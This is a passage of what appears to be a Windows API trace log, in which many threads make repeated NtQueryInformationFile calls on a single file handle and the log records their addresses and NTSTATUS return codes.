FileInformation=0x208e20) returned 0xc000000d Thread: id = 295 os_tid = 0x4dc [0161.150] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffcb0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffcb0, FileInformation=0x208e20) returned 0x0 Thread: id = 296 os_tid = 0x43c [0161.156] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f860, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f860, FileInformation=0x208e20) returned 0x0 Thread: id = 297 os_tid = 0x1c4 [0161.159] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f8c8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f8c8, FileInformation=0x208e20) returned 0x0 Thread: id = 298 os_tid = 0xbec [0161.164] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfcd0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfcd0, FileInformation=0x208e20) returned 0x0 Thread: id = 299 os_tid = 0xb48 [0161.166] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fac8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fac8, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 300 os_tid = 0x5bc [0161.169] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fe88, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fe88, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 301 os_tid = 0x6b8 [0161.170] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfb10, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfb10, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 302 os_tid = 0x2dc [0161.172] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf9c0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf9c0, FileInformation=0x208e20) returned 0x0 Thread: id = 303 os_tid = 0x158 [0161.173] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fe08, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fe08, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 304 os_tid = 0x6cc [0161.175] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfd50, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfd50, FileInformation=0x208e20) returned 0x0 Thread: id = 305 os_tid = 0x694 [0161.177] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fbc0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fbc0, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 306 os_tid = 0x6d8 [0161.179] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fa98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fa98, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 307 os_tid = 0x87c [0161.181] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fd58, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fd58, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 308 os_tid = 0xb88 [0161.187] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375ff80, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375ff80, FileInformation=0x208e20) returned 0x0 Thread: id = 309 os_tid = 0xb8c [0161.189] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffc28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffc28, FileInformation=0x208e20) returned 0xc000000d Thread: id = 310 os_tid = 0x700 [0161.190] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfdc8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfdc8, FileInformation=0x208e20) returned 0x0 Thread: id = 311 os_tid = 0x6f0 [0161.192] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f800, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f800, FileInformation=0x208e20) returned 0x0 Thread: id = 312 os_tid = 0x130 [0161.194] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfb28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfb28, FileInformation=0x208e20) returned 0x0 Thread: id = 313 os_tid = 0x754 [0161.196] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fc48, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fc48, FileInformation=0x208e20) returned 0x0 Thread: id = 314 os_tid = 0x72c [0161.198] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f9c8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f9c8, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 315 os_tid = 0x748 [0161.200] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df828, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df828, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 316 os_tid = 0x928 [0161.202] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fad8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fad8, FileInformation=0x208e20) returned 0x0 Thread: id = 317 os_tid = 0xcc [0161.204] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bff30, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bff30, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 318 os_tid = 0xd0 [0161.206] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fc40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fc40, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 319 os_tid = 0xd4 [0161.208] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf930, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf930, FileInformation=0x208e20) returned 0x0 Thread: id = 320 os_tid = 0xd8 [0161.210] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fcf0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fcf0, FileInformation=0x208e20) returned 0x0 Thread: id = 321 os_tid = 0xdc [0161.212] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffd80, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffd80, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 322 os_tid = 0xe0 [0161.214] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f9c0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f9c0, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 323 os_tid = 0xe4 [0161.220] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fbb8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fbb8, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 324 os_tid = 0xe8 [0161.224] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff7f8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff7f8, FileInformation=0x208e20) returned 0xc00000bb Thread: id = 325 os_tid = 0xec [0161.229] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fd58, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fd58, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 326 os_tid = 0x9d8 [0161.231] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fb88, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fb88, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 327 os_tid = 0x898 [0161.233] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfb40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfb40, FileInformation=0x208e20) returned 0x0 Thread: id = 328 os_tid = 0x48c [0161.235] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fe90, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fe90, FileInformation=0x208e20) returned 0x0 Thread: id = 329 os_tid = 0x6a4 [0161.237] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfe58, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfe58, FileInformation=0x208e20) returned 0x0 Thread: id = 330 os_tid = 0x20c [0161.240] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f830, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f830, FileInformation=0x208e20) returned 0x0 Thread: id = 331 os_tid = 0x704 [0161.241] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fb48, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fb48, FileInformation=0x208e20) returned 0x0 Thread: id = 332 os_tid = 0x568 [0161.243] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f8f8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f8f8, FileInformation=0x208e20) returned 0x0 Thread: id = 333 os_tid = 0x5ac [0161.245] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fb58, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fb58, FileInformation=0x208e20) returned 0x0 Thread: id = 334 os_tid = 0x908 [0161.247] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fa50, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fa50, FileInformation=0x208e20) returned 0x0 Thread: id = 335 os_tid = 0x888 [0161.250] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fb40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fb40, FileInformation=0x208e20) returned 0x0 Thread: id = 336 os_tid = 0x544 [0161.252] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fcf0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fcf0, FileInformation=0x208e20) returned 0x0 Thread: id = 337 os_tid = 0x76c [0161.254] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff900, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff900, FileInformation=0x208e20) returned 0x0 Thread: id = 338 os_tid = 0xa9c [0161.259] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfea8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfea8, FileInformation=0x208e20) returned 0x0 Thread: id = 339 os_tid = 0x114 [0161.261] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfc98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfc98, FileInformation=0x208e20) returned 0x0 Thread: id = 340 os_tid = 0x5b8 [0161.262] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fef8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fef8, FileInformation=0x208e20) returned 0x0 Thread: id = 341 os_tid = 0x814 [0161.264] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f8b0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f8b0, FileInformation=0x208e20) returned 0x0 Thread: id = 342 os_tid = 0x834 [0161.266] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fee8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fee8, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 343 os_tid = 0x884 [0161.268] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df868, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df868, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 344 os_tid = 0x5d4 [0161.270] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fb00, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fb00, FileInformation=0x208e20) returned 0x0 Thread: id = 345 os_tid = 0x340 [0161.272] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f798, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f798, FileInformation=0x208e20) returned 0x0 Thread: id = 346 os_tid = 0x810 [0161.274] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f868, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f868, FileInformation=0x208e20) returned 0x0 Thread: id = 347 os_tid = 0x830 [0161.276] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffa38, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffa38, FileInformation=0x208e20) returned 0x0 Thread: id = 348 os_tid = 0x880 [0161.278] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f9c0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f9c0, FileInformation=0x208e20) returned 0x0 Thread: id = 349 os_tid = 0xae4 [0161.280] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f838, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f838, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 350 os_tid = 0x570 [0161.282] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fba0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fba0, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 351 os_tid = 0xb40 [0161.284] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfc40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfc40, FileInformation=0x208e20) returned 0x0 Thread: id = 352 os_tid = 0x5f4 [0161.286] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fa80, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fa80, FileInformation=0x208e20) returned 0x0 Thread: id = 353 os_tid = 0xbb8 [0161.288] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fd00, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fd00, FileInformation=0x208e20) returned 0x0 Thread: id = 354 os_tid = 0x598 [0161.290] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fd20, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fd20, FileInformation=0x208e20) returned 0x0 Thread: id = 355 os_tid = 0x4e4 [0161.292] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfda0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfda0, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 356 os_tid = 0xbfc [0161.298] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fe98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fe98, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 357 os_tid = 0x80c [0161.304] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff998, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff998, FileInformation=0x208e20) returned 0x0 Thread: id = 358 os_tid = 0xbf8 [0161.306] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df938, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df938, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 359 os_tid = 0x524 [0161.308] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf9e0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf9e0, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 360 os_tid = 0x674 [0161.313] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffe30, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffe30, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 361 os_tid = 0x4a0 [0161.314] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fa80, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fa80, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 362 os_tid = 0x5d8 [0161.316] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffd10, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffd10, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 363 os_tid = 0x788 [0161.318] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fec8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fec8, FileInformation=0x208e20) returned 0x0 Thread: id = 364 os_tid = 0x69c [0161.320] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffa18, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffa18, FileInformation=0x208e20) returned 0x0 Thread: id = 365 os_tid = 0x6a8 [0161.322] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f830, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f830, FileInformation=0x208e20) returned 0x0 Thread: id = 366 os_tid = 0x500 [0161.324] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc68, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc68, FileInformation=0x208e20) returned 0x0 Thread: id = 367 os_tid = 0x4e0 [0161.329] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffb50, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffb50, FileInformation=0x208e20) returned 0x0 Thread: id = 368 os_tid = 0x330 [0161.332] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffcd0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffcd0, FileInformation=0x208e20) returned 0x0 Thread: id = 369 os_tid = 0xa30 [0161.333] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff830, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff830, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 370 os_tid = 0xb50 [0161.335] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fc18, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fc18, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 371 os_tid = 0xb70 [0161.337] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfcb0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfcb0, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 372 os_tid = 0xb6c [0161.339] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff8d0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff8d0, FileInformation=0x208e20) returned 0x0 Thread: id = 373 os_tid = 0xb74 [0161.340] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371faf8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371faf8, FileInformation=0x208e20) returned 0x0 Thread: id = 374 os_tid = 0xb68 [0161.342] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfe50, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfe50, FileInformation=0x208e20) returned 0x0 Thread: id = 375 os_tid = 0x758 [0161.344] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f948, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f948, FileInformation=0x208e20) returned 0x0 Thread: id = 376 os_tid = 0x3d4 [0161.346] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fe88, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fe88, FileInformation=0x208e20) returned 0x0 Thread: id = 377 os_tid = 0x484 [0161.348] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f8d8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f8d8, FileInformation=0x208e20) returned 0x0 Thread: id = 378 os_tid = 0xb4c [0161.350] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf8a0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf8a0, FileInformation=0x208e20) returned 0x0 Thread: id = 379 os_tid = 0xa1c [0161.352] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fa98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fa98, FileInformation=0x208e20) returned 0x0 Thread: id = 380 os_tid = 0x2ac [0161.354] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfee0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfee0, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 381 os_tid = 0xa8c [0161.356] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fb88, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fb88, FileInformation=0x208e20) returned 0x0 Thread: id = 382 os_tid = 0x68c [0161.358] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfb08, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfb08, FileInformation=0x208e20) returned 0x0 Thread: id = 383 os_tid = 0x388 [0161.360] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa98, FileInformation=0x208e20) returned 0x0 Thread: id = 384 os_tid = 0xa50 [0161.361] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fb20, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fb20, FileInformation=0x208e20) returned 0x0 Thread: id = 385 os_tid = 0x75c [0161.363] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df9b0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df9b0, FileInformation=0x208e20) returned 0x0 Thread: id = 386 os_tid = 0x240 [0161.365] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fa98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fa98, FileInformation=0x208e20) returned 0x0 Thread: id = 387 os_tid = 0x320 [0161.367] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfd40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfd40, FileInformation=0x208e20) returned 0x0 Thread: id = 388 os_tid = 0x3b4 [0161.368] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f7f8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f7f8, FileInformation=0x208e20) returned 0x0 Thread: id = 389 os_tid = 0x760 [0161.370] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f8c0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f8c0, FileInformation=0x208e20) returned 0x0 Thread: id = 390 os_tid = 0xb00 [0161.372] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfbf8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfbf8, FileInformation=0x208e20) returned 0x0 Thread: id = 391 os_tid = 0x7fc [0161.374] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f7b0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f7b0, FileInformation=0x208e20) returned 0x0 Thread: id = 392 os_tid = 0xb18 [0161.376] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fe20, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fe20, FileInformation=0x208e20) returned 0x0 Thread: id = 393 os_tid = 0xa68 [0161.378] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffe48, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffe48, FileInformation=0x208e20) returned 0x0 Thread: id = 394 os_tid = 0x224 [0161.380] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffcb8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffcb8, FileInformation=0x208e20) returned 0x0 Thread: id = 395 os_tid = 0x2c4 [0161.382] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373feb0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373feb0, FileInformation=0x208e20) returned 0x0 Thread: id = 396 os_tid = 0x24c [0161.384] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fed8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fed8, FileInformation=0x208e20) returned 0x0 Thread: id = 397 os_tid = 0x4e8 [0161.386] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df8b0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df8b0, FileInformation=0x208e20) returned 0x0 Thread: id = 398 os_tid = 0x220 [0161.388] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f7b0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f7b0, FileInformation=0x208e20) returned 0x0 Thread: id = 399 os_tid = 0xb04 [0161.393] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fdd0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fdd0, FileInformation=0x208e20) returned 0x0 Thread: id = 400 os_tid = 0x180 [0161.395] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fea8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fea8, FileInformation=0x208e20) returned 0x0 Thread: id = 401 os_tid = 0x53c [0161.397] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365ff28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365ff28, FileInformation=0x208e20) returned 0x0 Thread: id = 402 os_tid = 0x5b4 [0161.399] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf948, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf948, FileInformation=0x208e20) returned 0x0 Thread: id = 403 os_tid = 0x614 [0161.401] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365ff68, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365ff68, FileInformation=0x208e20) returned 0x0 Thread: id = 404 os_tid = 0x690 [0161.403] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fd10, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 